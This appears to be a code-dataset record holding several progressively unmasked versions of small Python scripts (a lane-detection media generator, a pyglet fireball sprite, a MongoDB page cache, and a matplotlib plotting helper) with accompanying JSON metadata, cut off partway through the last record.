return [os.path.join(files_dir, f) for f in filenames]
def process_images(im_filenames, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
images = (mpimg.imread(fname) for fname in im_filenames)
return (find_and_draw_lanes(im) for im in images)
def save_images(images, destination_filenames):
for fname, im in zip(destination_filenames, images):
mpimg.imsave(fname, im)
def process_and_save_video(video_fname_src, video_fname_dst, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
video_src = VideoFileClip(video_fname_src)
video_dst = video_src.fl_image(find_and_draw_lanes)
video_dst.write_videofile(video_fname_dst, audio=False)
def visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):
runner = CompGraphRunner(cg, frozen_tokens=params)
ag = to_agraph(runner.token_manager.to_networkx())
ag.layout('dot')
ag.draw(fname_dst)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def create_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def get_full_paths_to_files(files_dir, filenames):
return [os.path.join(files_dir, f) for f in filenames]
def process_images(im_filenames, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
images = (mpimg.imread(fname) for fname in im_filenames)
return (find_and_draw_lanes(im) for im in images)
def save_images(images, destination_filenames):
for fname, im in zip(destination_filenames, images):
mpimg.imsave(fname, im)
def process_and_save_video(video_fname_src, video_fname_dst, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
video_src = VideoFileClip(video_fname_src)
video_dst = video_src.fl_image(find_and_draw_lanes)
video_dst.write_videofile(video_fname_dst, audio=False)
def visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):
runner = CompGraphRunner(cg, frozen_tokens=params)
ag = to_agraph(runner.token_manager.to_networkx())
ag.layout('dot')
ag.draw(fname_dst)
if __name__ == '__main__':
""" INITIALIZATION """
im_dir_src = 'test_images'
im_dir_dst = 'test_images_output'
create_dir(im_dir_dst)
im_files_src = get_full_paths_to_files(im_dir_src, os.listdir(im_dir_src))
im_files_dst = get_full_paths_to_files(im_dir_dst, os.listdir(im_dir_src))
video_dir_src = 'test_videos'
video_dir_dst = 'test_videos_output'
create_dir(video_dir_dst)
video_files = 'solidWhiteRight.mp4', 'solidYellowLeft.mp4'
video_files_src = get_full_paths_to_files(video_dir_src, video_files)
video_files_dst = get_full_paths_to_files(video_dir_dst, video_files)
params_1 = DEFAULT_PARAMS.copy()
params_1['canny_lo'] = 50
params_1['canny_hi'] = 150
""" MEDIA GENERATION """
visualize_pipeline('pipeline.png')
images_dst = process_images(im_files_src, COMP_GRAPH, DEFAULT_PARAMS)
save_images(images_dst, im_files_dst)
process_and_save_video(video_files_src[0], video_files_dst[0],
COMP_GRAPH, DEFAULT_PARAMS)
process_and_save_video(video_files_src[1], video_files_dst[1],
COMP_GRAPH, params_1)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
COMP_GRAPH = lanespipeline.computational_graph
DEFAULT_PARAMS = lanespipeline.parameters
def create_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def get_full_paths_to_files(files_dir, filenames):
return [os.path.join(files_dir, f) for f in filenames]
def process_images(im_filenames, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
images = (mpimg.imread(fname) for fname in im_filenames)
return (find_and_draw_lanes(im) for im in images)
def save_images(images, destination_filenames):
for fname, im in zip(destination_filenames, images):
mpimg.imsave(fname, im)
def process_and_save_video(video_fname_src, video_fname_dst, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
video_src = VideoFileClip(video_fname_src)
video_dst = video_src.fl_image(find_and_draw_lanes)
video_dst.write_videofile(video_fname_dst, audio=False)
def visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):
runner = CompGraphRunner(cg, frozen_tokens=params)
ag = to_agraph(runner.token_manager.to_networkx())
ag.layout('dot')
ag.draw(fname_dst)
if __name__ == '__main__':
""" INITIALIZATION """
im_dir_src = 'test_images'
im_dir_dst = 'test_images_output'
create_dir(im_dir_dst)
im_files_src = get_full_paths_to_files(im_dir_src, os.listdir(im_dir_src))
im_files_dst = get_full_paths_to_files(im_dir_dst, os.listdir(im_dir_src))
video_dir_src = 'test_videos'
video_dir_dst = 'test_videos_output'
create_dir(video_dir_dst)
video_files = 'solidWhiteRight.mp4', 'solidYellowLeft.mp4'
video_files_src = get_full_paths_to_files(video_dir_src, video_files)
video_files_dst = get_full_paths_to_files(video_dir_dst, video_files)
params_1 = DEFAULT_PARAMS.copy()
params_1['canny_lo'] = 50
params_1['canny_hi'] = 150
""" MEDIA GENERATION """
visualize_pipeline('pipeline.png')
images_dst = process_images(im_files_src, COMP_GRAPH, DEFAULT_PARAMS)
save_images(images_dst, im_files_dst)
process_and_save_video(video_files_src[0], video_files_dst[0],
COMP_GRAPH, DEFAULT_PARAMS)
process_and_save_video(video_files_src[1], video_files_dst[1],
COMP_GRAPH, params_1)
<|reserved_special_token_1|>
'''
Generate the output images and videos, including rendering of the pipeline
'''
import os
import matplotlib.image as mpimg
import cv2
from moviepy.editor import VideoFileClip
from networkx.drawing.nx_agraph import to_agraph
import lanespipeline
import lanefinder
from compgraph import CompGraph, CompGraphRunner
COMP_GRAPH = lanespipeline.computational_graph
DEFAULT_PARAMS = lanespipeline.parameters
def create_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def get_full_paths_to_files(files_dir, filenames):
return [os.path.join(files_dir, f) for f in filenames]
def process_images(im_filenames, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
images = (mpimg.imread(fname) for fname in im_filenames)
return (find_and_draw_lanes(im) for im in images)
def save_images(images, destination_filenames):
for fname, im in zip(destination_filenames, images):
mpimg.imsave(fname, im)
def process_and_save_video(video_fname_src, video_fname_dst, cg, params):
finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)
video_src = VideoFileClip(video_fname_src)
video_dst = video_src.fl_image(find_and_draw_lanes)
video_dst.write_videofile(video_fname_dst, audio=False)
def visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):
runner = CompGraphRunner(cg, frozen_tokens=params)
ag = to_agraph(runner.token_manager.to_networkx())
ag.layout('dot')
ag.draw(fname_dst)
if __name__ == '__main__':
''' INITIALIZATION '''
im_dir_src = 'test_images'
im_dir_dst = 'test_images_output'
create_dir(im_dir_dst)
im_files_src = get_full_paths_to_files(im_dir_src, os.listdir(im_dir_src))
im_files_dst = get_full_paths_to_files(im_dir_dst, os.listdir(im_dir_src))
video_dir_src = 'test_videos'
video_dir_dst = 'test_videos_output'
create_dir(video_dir_dst)
video_files = ('solidWhiteRight.mp4', 'solidYellowLeft.mp4')
video_files_src = get_full_paths_to_files(video_dir_src, video_files)
video_files_dst = get_full_paths_to_files(video_dir_dst, video_files)
params_1 = DEFAULT_PARAMS.copy()
params_1['canny_lo'] = 50
params_1['canny_hi'] = 150
''' MEDIA GENERATION '''
visualize_pipeline('pipeline.png')
images_dst = process_images(im_files_src, COMP_GRAPH, DEFAULT_PARAMS)
save_images(images_dst, im_files_dst)
process_and_save_video(video_files_src[0], video_files_dst[0], COMP_GRAPH, DEFAULT_PARAMS)
process_and_save_video(video_files_src[1], video_files_dst[1], COMP_GRAPH, params_1)
|
flexible
|
{
"blob_id": "456d79a69c170a59af742648f16e0171cd5a2412",
"index": 1412,
"step-1": "<mask token>\n\n\ndef create_dir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_full_paths_to_files(files_dir, filenames):\n return [os.path.join(files_dir, f) for f in filenames]\n\n\ndef process_images(im_filenames, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n images = (mpimg.imread(fname) for fname in im_filenames)\n return (find_and_draw_lanes(im) for im in images)\n\n\ndef save_images(images, destination_filenames):\n for fname, im in zip(destination_filenames, images):\n mpimg.imsave(fname, im)\n\n\n<mask token>\n\n\ndef visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):\n runner = CompGraphRunner(cg, frozen_tokens=params)\n ag = to_agraph(runner.token_manager.to_networkx())\n ag.layout('dot')\n ag.draw(fname_dst)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_dir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_full_paths_to_files(files_dir, filenames):\n return [os.path.join(files_dir, f) for f in filenames]\n\n\ndef process_images(im_filenames, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n images = (mpimg.imread(fname) for fname in im_filenames)\n return (find_and_draw_lanes(im) for im in images)\n\n\ndef save_images(images, destination_filenames):\n for fname, im in zip(destination_filenames, images):\n mpimg.imsave(fname, im)\n\n\ndef process_and_save_video(video_fname_src, video_fname_dst, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n video_src = VideoFileClip(video_fname_src)\n video_dst = video_src.fl_image(find_and_draw_lanes)\n video_dst.write_videofile(video_fname_dst, audio=False)\n\n\ndef visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):\n runner = CompGraphRunner(cg, frozen_tokens=params)\n ag = to_agraph(runner.token_manager.to_networkx())\n ag.layout('dot')\n ag.draw(fname_dst)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef create_dir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_full_paths_to_files(files_dir, filenames):\n return [os.path.join(files_dir, f) for f in filenames]\n\n\ndef process_images(im_filenames, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n images = (mpimg.imread(fname) for fname in im_filenames)\n return (find_and_draw_lanes(im) for im in images)\n\n\ndef save_images(images, destination_filenames):\n for fname, im in zip(destination_filenames, images):\n mpimg.imsave(fname, im)\n\n\ndef process_and_save_video(video_fname_src, video_fname_dst, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n video_src = VideoFileClip(video_fname_src)\n video_dst = video_src.fl_image(find_and_draw_lanes)\n video_dst.write_videofile(video_fname_dst, audio=False)\n\n\ndef visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):\n runner = CompGraphRunner(cg, frozen_tokens=params)\n ag = to_agraph(runner.token_manager.to_networkx())\n ag.layout('dot')\n ag.draw(fname_dst)\n\n\nif __name__ == '__main__':\n \"\"\" INITIALIZATION \"\"\"\n im_dir_src = 'test_images'\n im_dir_dst = 'test_images_output'\n create_dir(im_dir_dst)\n im_files_src = get_full_paths_to_files(im_dir_src, os.listdir(im_dir_src))\n im_files_dst = get_full_paths_to_files(im_dir_dst, os.listdir(im_dir_src))\n video_dir_src = 'test_videos'\n video_dir_dst = 'test_videos_output'\n create_dir(video_dir_dst)\n video_files = 'solidWhiteRight.mp4', 'solidYellowLeft.mp4'\n video_files_src = get_full_paths_to_files(video_dir_src, video_files)\n video_files_dst = get_full_paths_to_files(video_dir_dst, video_files)\n params_1 = DEFAULT_PARAMS.copy()\n params_1['canny_lo'] = 50\n params_1['canny_hi'] = 150\n \"\"\" MEDIA GENERATION \"\"\"\n visualize_pipeline('pipeline.png')\n images_dst = process_images(im_files_src, COMP_GRAPH, DEFAULT_PARAMS)\n save_images(images_dst, im_files_dst)\n process_and_save_video(video_files_src[0], video_files_dst[0],\n COMP_GRAPH, DEFAULT_PARAMS)\n process_and_save_video(video_files_src[1], video_files_dst[1],\n COMP_GRAPH, params_1)\n",
"step-4": "<mask token>\nCOMP_GRAPH = lanespipeline.computational_graph\nDEFAULT_PARAMS = lanespipeline.parameters\n\n\ndef create_dir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_full_paths_to_files(files_dir, filenames):\n return [os.path.join(files_dir, f) for f in filenames]\n\n\ndef process_images(im_filenames, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n images = (mpimg.imread(fname) for fname in im_filenames)\n return (find_and_draw_lanes(im) for im in images)\n\n\ndef save_images(images, destination_filenames):\n for fname, im in zip(destination_filenames, images):\n mpimg.imsave(fname, im)\n\n\ndef process_and_save_video(video_fname_src, video_fname_dst, cg, params):\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n video_src = VideoFileClip(video_fname_src)\n video_dst = video_src.fl_image(find_and_draw_lanes)\n video_dst.write_videofile(video_fname_dst, audio=False)\n\n\ndef visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):\n runner = CompGraphRunner(cg, frozen_tokens=params)\n ag = to_agraph(runner.token_manager.to_networkx())\n ag.layout('dot')\n ag.draw(fname_dst)\n\n\nif __name__ == '__main__':\n \"\"\" INITIALIZATION \"\"\"\n im_dir_src = 'test_images'\n im_dir_dst = 'test_images_output'\n create_dir(im_dir_dst)\n im_files_src = get_full_paths_to_files(im_dir_src, os.listdir(im_dir_src))\n im_files_dst = get_full_paths_to_files(im_dir_dst, os.listdir(im_dir_src))\n video_dir_src = 'test_videos'\n video_dir_dst = 'test_videos_output'\n create_dir(video_dir_dst)\n video_files = 'solidWhiteRight.mp4', 'solidYellowLeft.mp4'\n video_files_src = get_full_paths_to_files(video_dir_src, video_files)\n video_files_dst = get_full_paths_to_files(video_dir_dst, video_files)\n params_1 = DEFAULT_PARAMS.copy()\n params_1['canny_lo'] = 50\n params_1['canny_hi'] = 150\n \"\"\" MEDIA GENERATION \"\"\"\n visualize_pipeline('pipeline.png')\n images_dst = process_images(im_files_src, COMP_GRAPH, DEFAULT_PARAMS)\n save_images(images_dst, im_files_dst)\n process_and_save_video(video_files_src[0], video_files_dst[0],\n COMP_GRAPH, DEFAULT_PARAMS)\n process_and_save_video(video_files_src[1], video_files_dst[1],\n COMP_GRAPH, params_1)\n",
"step-5": "'''\nGenerate the output images and videos, including rendering of the pipeline\n'''\n\nimport os\nimport matplotlib.image as mpimg\nimport cv2\nfrom moviepy.editor import VideoFileClip\nfrom networkx.drawing.nx_agraph import to_agraph\n\nimport lanespipeline\nimport lanefinder\nfrom compgraph import CompGraph, CompGraphRunner\n\n\nCOMP_GRAPH = lanespipeline.computational_graph\nDEFAULT_PARAMS = lanespipeline.parameters\n\n\ndef create_dir(directory):\n\n if not os.path.exists(directory):\n os.makedirs(directory)\n\ndef get_full_paths_to_files(files_dir, filenames):\n\n return [os.path.join(files_dir, f) for f in filenames]\n\n\ndef process_images(im_filenames, cg, params):\n\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n\n images = (mpimg.imread(fname) for fname in im_filenames)\n\n return (find_and_draw_lanes(im) for im in images)\n\n\ndef save_images(images, destination_filenames):\n\n for fname, im in zip(destination_filenames, images):\n mpimg.imsave(fname, im)\n\n\ndef process_and_save_video(video_fname_src, video_fname_dst, cg, params):\n\n finder, find_and_draw_lanes = lanefinder.create_objects(cg, params)\n\n video_src = VideoFileClip(video_fname_src)\n\n video_dst = video_src.fl_image(find_and_draw_lanes)\n video_dst.write_videofile(video_fname_dst, audio=False)\n\n\ndef visualize_pipeline(fname_dst, cg=COMP_GRAPH, params=DEFAULT_PARAMS):\n\n runner = CompGraphRunner(cg, frozen_tokens=params)\n\n ag = to_agraph(runner.token_manager.to_networkx())\n ag.layout('dot')\n ag.draw(fname_dst)\n\n\nif __name__ == '__main__':\n\n ''' INITIALIZATION '''\n\n im_dir_src = 'test_images'\n im_dir_dst = 'test_images_output'\n create_dir(im_dir_dst)\n\n im_files_src = get_full_paths_to_files(im_dir_src, os.listdir(im_dir_src))\n im_files_dst = get_full_paths_to_files(im_dir_dst, os.listdir(im_dir_src))\n\n video_dir_src = 'test_videos'\n video_dir_dst = 'test_videos_output'\n create_dir(video_dir_dst)\n\n video_files = ('solidWhiteRight.mp4', 'solidYellowLeft.mp4')\n video_files_src = get_full_paths_to_files(video_dir_src, video_files)\n video_files_dst = get_full_paths_to_files(video_dir_dst, video_files)\n\n params_1 = DEFAULT_PARAMS.copy()\n params_1['canny_lo'] = 50\n params_1['canny_hi'] = 150\n\n ''' MEDIA GENERATION '''\n\n visualize_pipeline('pipeline.png')\n\n images_dst = process_images(im_files_src, COMP_GRAPH, DEFAULT_PARAMS)\n save_images(images_dst, im_files_dst)\n\n process_and_save_video(video_files_src[0], video_files_dst[0], COMP_GRAPH, DEFAULT_PARAMS)\n process_and_save_video(video_files_src[1], video_files_dst[1], COMP_GRAPH, params_1)\n",
"step-ids": [
5,
6,
7,
8,
10
]
}
|
[
5,
6,
7,
8,
10
] |
<|reserved_special_token_0|>
class Fire(pyglet.sprite.Sprite):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def update(self):
self.rotation += self.rotate_speed
self.x += self.velocity_x
self.check_bounds()
def remote_update(self, x, rotation):
self.rotation = rotation
self.x = x
self.check_bounds()
def distance(self, point_1=(0, 0), point_2=(0, 0)):
"""Returns the distance between two points"""
return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -
point_2[1]) ** 2)
def collides_with(self, other_object):
collision_distance = (self.image.width * 0.5 * self.scale +
other_object.image.width * 0.5 * other_object.scale)
actual_distance = self.distance(self.position, other_object.position)
return actual_distance <= collision_distance
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Fire(pyglet.sprite.Sprite):
def __init__(self, *args, **kwargs):
super(Fire, self).__init__(*args, img=fireball, **kwargs)
self.rotation = 45
self.rotate_speed = 5
self.velocity_x = 5
<|reserved_special_token_0|>
def update(self):
self.rotation += self.rotate_speed
self.x += self.velocity_x
self.check_bounds()
def remote_update(self, x, rotation):
self.rotation = rotation
self.x = x
self.check_bounds()
def distance(self, point_1=(0, 0), point_2=(0, 0)):
"""Returns the distance between two points"""
return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -
point_2[1]) ** 2)
def collides_with(self, other_object):
collision_distance = (self.image.width * 0.5 * self.scale +
other_object.image.width * 0.5 * other_object.scale)
actual_distance = self.distance(self.position, other_object.position)
return actual_distance <= collision_distance
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Fire(pyglet.sprite.Sprite):
def __init__(self, *args, **kwargs):
super(Fire, self).__init__(*args, img=fireball, **kwargs)
self.rotation = 45
self.rotate_speed = 5
self.velocity_x = 5
def check_bounds(self):
max_x = 1000 + self.image.width / 2
if self.x > max_x:
self.x = -self.image.width / 2
def update(self):
self.rotation += self.rotate_speed
self.x += self.velocity_x
self.check_bounds()
def remote_update(self, x, rotation):
self.rotation = rotation
self.x = x
self.check_bounds()
def distance(self, point_1=(0, 0), point_2=(0, 0)):
"""Returns the distance between two points"""
return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -
point_2[1]) ** 2)
def collides_with(self, other_object):
collision_distance = (self.image.width * 0.5 * self.scale +
other_object.image.width * 0.5 * other_object.scale)
actual_distance = self.distance(self.position, other_object.position)
return actual_distance <= collision_distance
<|reserved_special_token_1|>
import pyglet
import math
from lvl1_resources import fireball
class Fire(pyglet.sprite.Sprite):
def __init__(self, *args, **kwargs):
super(Fire, self).__init__(*args, img=fireball, **kwargs)
self.rotation = 45
self.rotate_speed = 5
self.velocity_x = 5
def check_bounds(self):
max_x = 1000 + self.image.width / 2
if self.x > max_x:
self.x = -self.image.width / 2
def update(self):
self.rotation += self.rotate_speed
self.x += self.velocity_x
self.check_bounds()
def remote_update(self, x, rotation):
self.rotation = rotation
self.x = x
self.check_bounds()
def distance(self, point_1=(0, 0), point_2=(0, 0)):
"""Returns the distance between two points"""
return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -
point_2[1]) ** 2)
def collides_with(self, other_object):
collision_distance = (self.image.width * 0.5 * self.scale +
other_object.image.width * 0.5 * other_object.scale)
actual_distance = self.distance(self.position, other_object.position)
return actual_distance <= collision_distance
<|reserved_special_token_1|>
import pyglet
import math
from lvl1_resources import fireball
class Fire(pyglet.sprite.Sprite):
def __init__( self, *args, **kwargs):
super(Fire, self).__init__(img= fireball, *args, **kwargs)
self.rotation= 45
self.rotate_speed= 5
self.velocity_x= 5
def check_bounds(self):
max_x= 1000 + self.image.width/2
if self.x > max_x:
self.x= -self.image.width/2
def update(self):
self.rotation += self.rotate_speed
self.x += self.velocity_x
self.check_bounds()
def remote_update(self, x, rotation):
self.rotation= rotation
self.x= x
self.check_bounds()
def distance(self, point_1=(0, 0), point_2=(0, 0)):
"""Returns the distance between two points"""
return math.sqrt((point_1[0]-point_2[0])**2+(point_1[1]-point_2[1])**2)
def collides_with(self, other_object):
collision_distance = self.image.width*0.5*self.scale \
+ other_object.image.width*0.5*other_object.scale
actual_distance = self.distance(self.position, other_object.position)
return (actual_distance <= collision_distance)
|
flexible
|
{
"blob_id": "cf2bbe332237bd849df62be099f1719eaf1f2082",
"index": 1523,
"step-1": "<mask token>\n\n\nclass Fire(pyglet.sprite.Sprite):\n <mask token>\n <mask token>\n\n def update(self):\n self.rotation += self.rotate_speed\n self.x += self.velocity_x\n self.check_bounds()\n\n def remote_update(self, x, rotation):\n self.rotation = rotation\n self.x = x\n self.check_bounds()\n\n def distance(self, point_1=(0, 0), point_2=(0, 0)):\n \"\"\"Returns the distance between two points\"\"\"\n return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -\n point_2[1]) ** 2)\n\n def collides_with(self, other_object):\n collision_distance = (self.image.width * 0.5 * self.scale + \n other_object.image.width * 0.5 * other_object.scale)\n actual_distance = self.distance(self.position, other_object.position)\n return actual_distance <= collision_distance\n",
"step-2": "<mask token>\n\n\nclass Fire(pyglet.sprite.Sprite):\n\n def __init__(self, *args, **kwargs):\n super(Fire, self).__init__(*args, img=fireball, **kwargs)\n self.rotation = 45\n self.rotate_speed = 5\n self.velocity_x = 5\n <mask token>\n\n def update(self):\n self.rotation += self.rotate_speed\n self.x += self.velocity_x\n self.check_bounds()\n\n def remote_update(self, x, rotation):\n self.rotation = rotation\n self.x = x\n self.check_bounds()\n\n def distance(self, point_1=(0, 0), point_2=(0, 0)):\n \"\"\"Returns the distance between two points\"\"\"\n return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -\n point_2[1]) ** 2)\n\n def collides_with(self, other_object):\n collision_distance = (self.image.width * 0.5 * self.scale + \n other_object.image.width * 0.5 * other_object.scale)\n actual_distance = self.distance(self.position, other_object.position)\n return actual_distance <= collision_distance\n",
"step-3": "<mask token>\n\n\nclass Fire(pyglet.sprite.Sprite):\n\n def __init__(self, *args, **kwargs):\n super(Fire, self).__init__(*args, img=fireball, **kwargs)\n self.rotation = 45\n self.rotate_speed = 5\n self.velocity_x = 5\n\n def check_bounds(self):\n max_x = 1000 + self.image.width / 2\n if self.x > max_x:\n self.x = -self.image.width / 2\n\n def update(self):\n self.rotation += self.rotate_speed\n self.x += self.velocity_x\n self.check_bounds()\n\n def remote_update(self, x, rotation):\n self.rotation = rotation\n self.x = x\n self.check_bounds()\n\n def distance(self, point_1=(0, 0), point_2=(0, 0)):\n \"\"\"Returns the distance between two points\"\"\"\n return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -\n point_2[1]) ** 2)\n\n def collides_with(self, other_object):\n collision_distance = (self.image.width * 0.5 * self.scale + \n other_object.image.width * 0.5 * other_object.scale)\n actual_distance = self.distance(self.position, other_object.position)\n return actual_distance <= collision_distance\n",
"step-4": "import pyglet\nimport math\nfrom lvl1_resources import fireball\n\n\nclass Fire(pyglet.sprite.Sprite):\n\n def __init__(self, *args, **kwargs):\n super(Fire, self).__init__(*args, img=fireball, **kwargs)\n self.rotation = 45\n self.rotate_speed = 5\n self.velocity_x = 5\n\n def check_bounds(self):\n max_x = 1000 + self.image.width / 2\n if self.x > max_x:\n self.x = -self.image.width / 2\n\n def update(self):\n self.rotation += self.rotate_speed\n self.x += self.velocity_x\n self.check_bounds()\n\n def remote_update(self, x, rotation):\n self.rotation = rotation\n self.x = x\n self.check_bounds()\n\n def distance(self, point_1=(0, 0), point_2=(0, 0)):\n \"\"\"Returns the distance between two points\"\"\"\n return math.sqrt((point_1[0] - point_2[0]) ** 2 + (point_1[1] -\n point_2[1]) ** 2)\n\n def collides_with(self, other_object):\n collision_distance = (self.image.width * 0.5 * self.scale + \n other_object.image.width * 0.5 * other_object.scale)\n actual_distance = self.distance(self.position, other_object.position)\n return actual_distance <= collision_distance\n",
"step-5": "import pyglet\nimport math\nfrom lvl1_resources import fireball\n\nclass Fire(pyglet.sprite.Sprite):\n\tdef __init__( self, *args, **kwargs):\n\t\tsuper(Fire, self).__init__(img= fireball, *args, **kwargs)\n\t\tself.rotation= 45\n\t\tself.rotate_speed= 5\n\t\tself.velocity_x= 5\n\n\tdef check_bounds(self):\n\t\tmax_x= 1000 + self.image.width/2\n\t\tif self.x > max_x:\n\t\t\tself.x= -self.image.width/2\n\n\tdef update(self):\n\t\tself.rotation += self.rotate_speed\n\t\tself.x += self.velocity_x\n\t\tself.check_bounds()\n\n\tdef remote_update(self, x, rotation):\n\t\tself.rotation= rotation\n\t\tself.x= x\n\t\tself.check_bounds()\n\n\tdef distance(self, point_1=(0, 0), point_2=(0, 0)):\n\t\t\"\"\"Returns the distance between two points\"\"\"\n\t\treturn math.sqrt((point_1[0]-point_2[0])**2+(point_1[1]-point_2[1])**2)\n\n\tdef collides_with(self, other_object):\n\n\t\tcollision_distance = self.image.width*0.5*self.scale \\\n + other_object.image.width*0.5*other_object.scale\n \n\t\tactual_distance = self.distance(self.position, other_object.position)\n \n\t\treturn (actual_distance <= collision_distance)\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
import mysql.connector
import hashlib
import time
from datetime import datetime
from datetime import timedelta
from pymongo import MongoClient
from pymongo import IndexModel, ASCENDING, DESCENDING
class MongoManager:
def __init__(self, server_ip='localhost', client=None, expires=timedelta(days=30)):
"""
client: mongo database client
expires: timedelta of amount of time before a cache entry is considered expired
"""
# if a client object is not passed
# then try connecting to mongodb at the default localhost port
self.client = MongoClient(server_ip, 27017) if client is None else client
#create collection to store cached webpages,
# which is the equivalent of a table in a relational database
self.db = self.client.spider
# create index if db is empty
if self.db.locations.count() is 0:
self.db.mfw.create_index([("url", ASCENDING)])
def query_by_url(self, url):
records = self.db.mfw.find({'url':url})
if records:
return records
else:
return None
def insert_page(self, url, html):
self.db.mfw.insert(
'url': url,
'html':html
)
def clear(self):
self.db.mfw.drop()
if __name__ == '__main__':
mongo_mgr = MongoManager()
|
normal
|
{
"blob_id": "4cb5dcf0d943ef15421bb6bced65804533d232e3",
"index": 4950,
"step-1": "import mysql.connector\nimport hashlib\nimport time \nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom pymongo import MongoClient\nfrom pymongo import IndexModel, ASCENDING, DESCENDING\n\n\nclass MongoManager:\n\n def __init__(self, server_ip='localhost', client=None, expires=timedelta(days=30)):\n \"\"\"\n client: mongo database client\n expires: timedelta of amount of time before a cache entry is considered expired\n \"\"\"\n # if a client object is not passed \n # then try connecting to mongodb at the default localhost port \n self.client = MongoClient(server_ip, 27017) if client is None else client\n #create collection to store cached webpages,\n # which is the equivalent of a table in a relational database\n self.db = self.client.spider\n\n # create index if db is empty\n if self.db.locations.count() is 0:\n self.db.mfw.create_index([(\"url\", ASCENDING)])\n\n def query_by_url(self, url):\n records = self.db.mfw.find({'url':url})\n\n if records:\n return records\n else:\n return None\n\n def insert_page(self, url, html):\n self.db.mfw.insert(\n 'url': url,\n 'html':html\n )\n\n def clear(self):\n self.db.mfw.drop()\n\nif __name__ == '__main__':\n mongo_mgr = MongoManager()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def xyplot(xdata, ydata, title):
fname = '/Users/nalmog/Desktop/swa_equipped_cumulative_' + title + '.png'
plt.plot(xdata, ydata)
plt.ylabel('some numbers')
plt.title(title)
plt.xlabel('Percent of Fleet')
plt.ylabel('Number of Passes')
plt.savefig(fname)
plt.clf()
<|reserved_special_token_1|>
import matplotlib.pyplot as plt
def xyplot(xdata, ydata, title):
fname = '/Users/nalmog/Desktop/swa_equipped_cumulative_' + title + '.png'
plt.plot(xdata, ydata)
plt.ylabel('some numbers')
plt.title(title)
plt.xlabel('Percent of Fleet')
plt.ylabel('Number of Passes')
plt.savefig(fname)
plt.clf()
<|reserved_special_token_1|>
import matplotlib.pyplot as plt
def xyplot(xdata,ydata,title):
fname = "/Users/nalmog/Desktop/swa_equipped_cumulative_"+title+".png"
#plt.figure(figsize=(500,500))
plt.plot(xdata, ydata)
plt.ylabel('some numbers')
# plt.savefig("/Users/nalmog/Desktop/swa_equipped_cumulative_"+title+".png", format='png')
#plt.show()
#plt.savefig("/Users/nalmog/Desktop/swa_equipped_cumulative_"+title+".png", format='png')
plt.title(title)
plt.xlabel("Percent of Fleet")
plt.ylabel("Number of Passes")
plt.savefig(fname)
plt.clf();
#plt.
|
flexible
|
{
"blob_id": "10a7c1827abb8a87f5965453aa2d8f5e8b4914e5",
"index": 6563,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef xyplot(xdata, ydata, title):\n fname = '/Users/nalmog/Desktop/swa_equipped_cumulative_' + title + '.png'\n plt.plot(xdata, ydata)\n plt.ylabel('some numbers')\n plt.title(title)\n plt.xlabel('Percent of Fleet')\n plt.ylabel('Number of Passes')\n plt.savefig(fname)\n plt.clf()\n",
